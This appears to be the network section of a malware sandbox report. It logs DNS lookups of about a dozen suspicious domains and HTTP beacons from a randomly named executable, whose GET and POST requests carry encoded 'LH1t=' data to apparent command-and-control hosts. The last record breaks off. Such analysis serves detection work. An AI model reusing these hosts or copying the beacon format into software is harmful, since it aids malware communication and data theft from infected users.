Jan 10, 2025 16:42:36.474833965 CET	80	50008	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:37.077045918 CET	80	50008	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:37.077656031 CET	80	50008	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:37.077850103 CET	50008	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:37.973077059 CET	50008	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:38.991897106 CET	50009	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:38.996743917 CET	80	50009	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:38.996895075 CET	50009	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:39.013355970 CET	50009	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:39.018667936 CET	80	50009	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:39.617222071 CET	80	50009	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:39.617943048 CET	80	50009	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:39.618012905 CET	50009	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:40.521035910 CET	50009	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:41.540086985 CET	50010	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:41.545190096 CET	80	50010	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:41.545284986 CET	50010	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:41.568582058 CET	50010	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:41.573417902 CET	80	50010	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:41.573513985 CET	80	50010	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:42.267117977 CET	80	50010	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:42.268692017 CET	80	50010	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:42.273070097 CET	50010	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:43.082026005 CET	50010	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:44.101053953 CET	50011	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:44.106018066 CET	80	50011	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:44.106123924 CET	50011	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:44.115647078 CET	50011	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:44.120572090 CET	80	50011	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:44.704507113 CET	80	50011	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:44.704699993 CET	80	50011	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:44.704987049 CET	50011	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:44.708781004 CET	50011	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:44.713637114 CET	80	50011	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:49.771645069 CET	50012	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:49.776465893 CET	80	50012	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:49.776525021 CET	50012	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:49.793512106 CET	50012	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:49.800105095 CET	80	50012	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:50.364763021 CET	80	50012	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:50.364857912 CET	80	50012	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:50.365113974 CET	50012	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:51.301028013 CET	50012	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:52.320854902 CET	50013	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:52.325761080 CET	80	50013	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:52.327714920 CET	50013	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:52.343151093 CET	50013	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:52.347959995 CET	80	50013	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:52.928463936 CET	80	50013	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:52.928560972 CET	80	50013	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:52.928900957 CET	50013	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:53.848280907 CET	50013	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:54.866781950 CET	50014	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:54.871686935 CET	80	50014	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:54.872199059 CET	50014	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:54.892805099 CET	50014	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:54.897712946 CET	80	50014	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:54.897877932 CET	80	50014	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:55.473339081 CET	80	50014	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:55.473535061 CET	80	50014	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:55.473578930 CET	50014	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:56.411045074 CET	50014	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:57.431489944 CET	50015	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:57.436441898 CET	80	50015	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:57.436554909 CET	50015	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:57.453388929 CET	50015	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:57.458266973 CET	80	50015	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:58.069431067 CET	80	50015	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:58.069459915 CET	80	50015	209.74.79.42	192.168.2.8
Jan 10, 2025 16:42:58.069647074 CET	50015	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:58.075073004 CET	50015	80	192.168.2.8	209.74.79.42
Jan 10, 2025 16:42:58.079827070 CET	80	50015	209.74.79.42	192.168.2.8
Jan 10, 2025 16:43:03.460745096 CET	50016	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:03.465681076 CET	80	50016	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:03.465756893 CET	50016	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:03.483990908 CET	50016	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:03.488945961 CET	80	50016	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:04.411766052 CET	80	50016	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:04.411919117 CET	80	50016	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:04.411988974 CET	50016	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:04.988826990 CET	50016	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:06.009761095 CET	50017	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:06.014734983 CET	80	50017	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:06.014800072 CET	50017	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:06.042838097 CET	50017	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:06.047648907 CET	80	50017	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:06.933271885 CET	80	50017	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:06.933372021 CET	80	50017	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:06.933516979 CET	50017	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:07.550760984 CET	50017	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:08.570092916 CET	50018	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:08.575020075 CET	80	50018	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:08.575331926 CET	50018	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:08.592808008 CET	50018	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:08.597690105 CET	80	50018	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:08.597789049 CET	80	50018	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:09.481182098 CET	80	50018	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:09.481218100 CET	80	50018	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:09.481266022 CET	50018	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:10.099586010 CET	50018	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:11.116751909 CET	50019	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:11.121642113 CET	80	50019	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:11.124963999 CET	50019	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:11.136811972 CET	50019	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:11.141582966 CET	80	50019	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:11.989800930 CET	80	50019	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:11.989871025 CET	80	50019	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:11.989975929 CET	50019	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:11.993202925 CET	50019	80	192.168.2.8	192.186.57.30
Jan 10, 2025 16:43:11.998017073 CET	80	50019	192.186.57.30	192.168.2.8
Jan 10, 2025 16:43:17.059849977 CET	50020	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:17.064718962 CET	80	50020	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:17.065025091 CET	50020	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:17.082104921 CET	50020	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:17.087089062 CET	80	50020	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:17.533128023 CET	80	50020	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:17.533200026 CET	50020	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:18.597646952 CET	50020	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:18.602469921 CET	80	50020	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:19.617012024 CET	50021	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:19.621889114 CET	80	50021	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:19.623351097 CET	50021	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:19.646878004 CET	50021	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:19.651758909 CET	80	50021	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:20.079459906 CET	80	50021	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:20.080786943 CET	50021	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:21.162934065 CET	50021	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:21.167757988 CET	80	50021	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:22.252542019 CET	50022	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:22.257427931 CET	80	50022	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:22.260246038 CET	50022	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:22.305792093 CET	50022	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:22.310731888 CET	80	50022	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:22.310805082 CET	80	50022	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:22.744076014 CET	80	50022	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:22.745066881 CET	50022	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:23.816409111 CET	50022	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:23.821275949 CET	80	50022	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.398482084 CET	50023	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:25.403301001 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.406991005 CET	50023	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:25.414829969 CET	50023	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:25.419591904 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862735033 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862763882 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862776041 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862829924 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862839937 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862853050 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862864017 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862874031 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862884998 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.862896919 CET	80	50023	84.32.84.32	192.168.2.8
Jan 10, 2025 16:43:25.864794970 CET	50023	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:25.867854118 CET	50023	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:25.867854118 CET	50023	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:43:25.872692108 CET	80	50023	84.32.84.32	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:40:10.908220053 CET	55033	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:40:10.923803091 CET	53	55033	1.1.1.1	192.168.2.8
Jan 10, 2025 16:40:55.273591042 CET	56717	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:40:55.328717947 CET	53	56717	1.1.1.1	192.168.2.8
Jan 10, 2025 16:41:08.617521048 CET	58838	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:41:08.790549994 CET	53	58838	1.1.1.1	192.168.2.8
Jan 10, 2025 16:41:27.945558071 CET	57101	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:41:27.972325087 CET	53	57101	1.1.1.1	192.168.2.8
Jan 10, 2025 16:41:41.776225090 CET	61469	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:41:41.789324045 CET	53	61469	1.1.1.1	192.168.2.8
Jan 10, 2025 16:41:55.415438890 CET	57992	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:41:55.791022062 CET	53	57992	1.1.1.1	192.168.2.8
Jan 10, 2025 16:42:09.054848909 CET	60317	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:42:09.088340998 CET	53	60317	1.1.1.1	192.168.2.8
Jan 10, 2025 16:42:22.747033119 CET	57778	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:42:22.761255026 CET	53	57778	1.1.1.1	192.168.2.8
Jan 10, 2025 16:42:35.916136980 CET	50441	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:42:36.446974993 CET	53	50441	1.1.1.1	192.168.2.8
Jan 10, 2025 16:42:49.729825020 CET	59862	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:42:49.768748045 CET	53	59862	1.1.1.1	192.168.2.8
Jan 10, 2025 16:43:03.086570024 CET	58353	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:43:03.457433939 CET	53	58353	1.1.1.1	192.168.2.8
Jan 10, 2025 16:43:17.008851051 CET	63329	53	192.168.2.8	1.1.1.1
Jan 10, 2025 16:43:17.052599907 CET	53	63329	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 16:40:10.908220053 CET	192.168.2.8	1.1.1.1	0xf338	Standard query (0)	www.arsanaroevir.sbs	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:40:55.273591042 CET	192.168.2.8	1.1.1.1	0x8a4a	Standard query (0)	www.sido247.pro	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:08.617521048 CET	192.168.2.8	1.1.1.1	0xaf0f	Standard query (0)	www.emirates-visa.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:27.945558071 CET	192.168.2.8	1.1.1.1	0xda6c	Standard query (0)	www.gisxj.sbs	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:41.776225090 CET	192.168.2.8	1.1.1.1	0xd6be	Standard query (0)	www.yhk58.one	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:55.415438890 CET	192.168.2.8	1.1.1.1	0x2101	Standard query (0)	www.zizjwk.asia	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:09.054848909 CET	192.168.2.8	1.1.1.1	0xc040	Standard query (0)	www.sssvip2.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:22.747033119 CET	192.168.2.8	1.1.1.1	0xd65a	Standard query (0)	www.pieceofpaper.site	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:35.916136980 CET	192.168.2.8	1.1.1.1	0xae45	Standard query (0)	www.aonline.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:49.729825020 CET	192.168.2.8	1.1.1.1	0xc42e	Standard query (0)	www.glowups.life	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:03.086570024 CET	192.168.2.8	1.1.1.1	0xb10d	Standard query (0)	www.yxni.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:17.008851051 CET	192.168.2.8	1.1.1.1	0x6a19	Standard query (0)	www.absseguridad.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 16:40:10.923803091 CET	1.1.1.1	192.168.2.8	0xf338	No error (0)	www.arsanaroevir.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:40:10.923803091 CET	1.1.1.1	192.168.2.8	0xf338	No error (0)	www.arsanaroevir.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:40:55.328717947 CET	1.1.1.1	192.168.2.8	0x8a4a	No error (0)	www.sido247.pro	sido247.pro		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:40:55.328717947 CET	1.1.1.1	192.168.2.8	0x8a4a	No error (0)	sido247.pro		84.32.84.32	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:08.790549994 CET	1.1.1.1	192.168.2.8	0xaf0f	No error (0)	www.emirates-visa.net	emirates-visa.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:41:08.790549994 CET	1.1.1.1	192.168.2.8	0xaf0f	No error (0)	emirates-visa.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:08.790549994 CET	1.1.1.1	192.168.2.8	0xaf0f	No error (0)	emirates-visa.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:27.972325087 CET	1.1.1.1	192.168.2.8	0xda6c	No error (0)	www.gisxj.sbs		91.195.240.123	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:41.789324045 CET	1.1.1.1	192.168.2.8	0xd6be	No error (0)	www.yhk58.one		38.181.21.54	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:41:55.791022062 CET	1.1.1.1	192.168.2.8	0x2101	No error (0)	www.zizjwk.asia		78.141.202.204	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:09.088340998 CET	1.1.1.1	192.168.2.8	0xc040	No error (0)	www.sssvip2.shop		156.253.8.115	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:22.761255026 CET	1.1.1.1	192.168.2.8	0xd65a	No error (0)	www.pieceofpaper.site	pieceofpaper.site		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:42:22.761255026 CET	1.1.1.1	192.168.2.8	0xd65a	No error (0)	pieceofpaper.site		142.93.62.161	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:36.446974993 CET	1.1.1.1	192.168.2.8	0xae45	No error (0)	www.aonline.top		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:36.446974993 CET	1.1.1.1	192.168.2.8	0xae45	No error (0)	www.aonline.top		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:36.446974993 CET	1.1.1.1	192.168.2.8	0xae45	No error (0)	www.aonline.top		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:36.446974993 CET	1.1.1.1	192.168.2.8	0xae45	No error (0)	www.aonline.top		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:36.446974993 CET	1.1.1.1	192.168.2.8	0xae45	No error (0)	www.aonline.top		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:36.446974993 CET	1.1.1.1	192.168.2.8	0xae45	No error (0)	www.aonline.top		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:36.446974993 CET	1.1.1.1	192.168.2.8	0xae45	No error (0)	www.aonline.top		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:49.768748045 CET	1.1.1.1	192.168.2.8	0xc42e	No error (0)	www.glowups.life		209.74.79.42	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:03.457433939 CET	1.1.1.1	192.168.2.8	0xb10d	No error (0)	www.yxni.vip		192.186.57.30	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:17.052599907 CET	1.1.1.1	192.168.2.8	0x6a19	No error (0)	www.absseguridad.online	absseguridad.online		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:43:17.052599907 CET	1.1.1.1	192.168.2.8	0x6a19	No error (0)	absseguridad.online		84.32.84.32	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.arsanaroevir.sbs

www.sido247.pro

www.emirates-visa.net

www.gisxj.sbs

www.yhk58.one

www.zizjwk.asia

www.sssvip2.shop

www.pieceofpaper.site

www.aonline.top

www.glowups.life

www.yxni.vip

www.absseguridad.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49713	188.114.96.3	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:40:10.979216099 CET	505	OUT	GET /xqw5/?LH1t=PgL+w3suN5a2aCULPl51FNItlV/4WI7K9O4xPjIpeH5nqFCmW9XWPtqfHZxAiv3GMUXF9O3JJlPzg8a/nz+CvTwzwjYhAcTQZVp8pHsPK/qnGNvgsyt+JmhWInh71R764A==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.arsanaroevir.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:40:50.252998114 CET	970	IN	HTTP/1.1 522 Date: Fri, 10 Jan 2025 15:40:50 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bii3wYKFXwKZn%2BbpjdbxTkJpHE8eGxW%2FDvYIUH91e%2B4R%2FQiK0Y1%2FmLCuGoGrvaPrcUUwCJnjg26NJWByru6kWFC6UUXi9jMoLsponbbFds6BwmbBhFgbCQFy5Qt18ihOApAuSj%2BLwg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8ffdc39b2b1942a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=505&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49941	84.32.84.32	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:40:55.351439953 CET	747	OUT	POST /c9n1/ HTTP/1.1 Host: www.sido247.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.sido247.pro Referer: http://www.sido247.pro/c9n1/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 55 4a 37 79 42 53 4d 4c 42 32 70 7a 4d 73 5a 31 2f 63 4b 5a 47 2b 44 34 4f 45 47 76 6d 41 5a 57 2b 36 57 4f 67 70 37 44 72 34 30 69 58 36 6b 37 36 71 79 73 68 51 63 30 38 61 72 44 52 57 6b 4a 4f 2b 4a 73 5a 4d 2f 52 6c 55 36 62 35 52 54 38 6a 51 35 45 48 4d 58 63 49 65 44 54 41 49 76 63 4b 6d 6b 71 68 61 4f 62 2b 32 63 78 64 65 6d 6e 72 54 63 49 59 52 4a 7a 4a 30 68 43 58 63 6d 42 34 56 36 72 48 6f 39 4e 4f 33 31 51 6d 53 4a 4a 6b 43 46 6a 4e 35 4f 4b 4f 32 6f 79 4a 6e 4d 78 48 65 6c 62 4e 54 58 53 39 77 6c 73 30 67 37 65 58 49 46 72 55 30 52 6c 65 69 67 63 4f 6e 62 42 58 53 32 49 74 45 55 3d Data Ascii: LH1t=UJ7yBSMLB2pzMsZ1/cKZG+D4OEGvmAZW+6WOgp7Dr40iX6k76qyshQc08arDRWkJO+JsZM/RlU6b5RT8jQ5EHMXcIeDTAIvcKmkqhaOb+2cxdemnrTcIYRJzJ0hCXcmB4V6rHo9NO31QmSJJkCFjN5OKO2oyJnMxHelbNTXS9wls0g7eXIFrU0RleigcOnbBXS2ItEU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49957	84.32.84.32	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:40:57.914160013 CET	767	OUT	POST /c9n1/ HTTP/1.1 Host: www.sido247.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.sido247.pro Referer: http://www.sido247.pro/c9n1/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 55 4a 37 79 42 53 4d 4c 42 32 70 7a 4e 49 64 31 7a 66 69 5a 41 65 44 37 53 55 47 76 7a 77 5a 53 2b 37 71 4f 67 6f 2f 54 73 4f 4d 69 58 62 55 37 6f 5a 71 73 69 51 63 30 6f 71 72 47 56 57 6b 53 4f 2b 45 62 5a 4a 66 52 6c 51 53 62 35 52 44 38 6a 68 35 48 46 63 58 65 41 2b 44 64 66 59 76 63 4b 6d 6b 71 68 61 71 39 2b 32 55 78 64 75 57 6e 71 79 63 50 47 68 4a 79 5a 6b 68 43 45 4d 6e 4b 34 56 36 4a 48 70 67 71 4f 30 4e 51 6d 51 68 4a 68 44 46 6b 47 35 4f 45 41 57 70 6d 50 6c 78 55 42 64 64 35 50 53 44 51 7a 68 31 72 31 57 4b 30 4e 71 4e 74 58 30 35 4f 65 68 49 71 4c 51 47 70 4e 78 6d 34 7a 54 44 76 2b 77 52 65 33 35 6f 6e 69 36 71 48 71 6a 42 34 7a 6a 39 64 Data Ascii: 